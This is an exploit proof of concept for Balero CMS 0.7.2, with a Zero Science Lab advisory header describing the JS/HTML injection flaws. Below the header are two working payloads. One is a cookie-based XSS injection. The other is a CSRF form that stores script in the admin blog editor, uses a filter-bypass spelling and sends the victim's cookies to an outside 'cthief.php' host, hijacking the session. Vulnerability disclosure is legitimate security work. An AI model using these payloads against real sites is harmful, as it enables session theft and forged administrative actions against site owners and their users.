60 lines
No EOL
1.8 KiB
HTML
60 lines
No EOL
1.8 KiB
HTML
<!--
|
|
|
|
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities
|
|
|
|
Vendor: BaleroCMS Software
|
|
Product web page: http://www.balerocms.com
|
|
Affected version: 0.7.2
|
|
|
|
Summary: Balero CMS is an open source project that can help you manage
|
|
the page of your company with just a few guided steps, minimizing the
|
|
costs that many companies make to have your advertising medium and/or
|
|
portal.
|
|
|
|
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
|
|
is not properly sanitised before being returned to the user. This can be
|
|
exploited to execute arbitrary HTML and script code in a user's browser
|
|
session in context of an affected site.
|
|
|
|
Tested on: Apache 2.4.10 (Win32)
|
|
PHP 5.6.3
|
|
MySQL 5.6.21
|
|
|
|
|
|
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2015-5239
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php
|
|
|
|
|
|
04.03.2015
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
csrf+stored xss+filter bypass+session hijack:
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
|
|
<input type="hidden" name="title" value="ZSL" />
|
|
<input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
|
|
<input type="hidden" name="files" value="joxy.poxy" />
|
|
<input type="hidden" name="delete_post[]" value="135" />
|
|
<input type="hidden" name="id" value="135" />
|
|
<input type="hidden" name="submit" value="" />
|
|
<input type="submit" value="Submit form" />
|
|
</form>
|
|
</body>
|
|
</html> |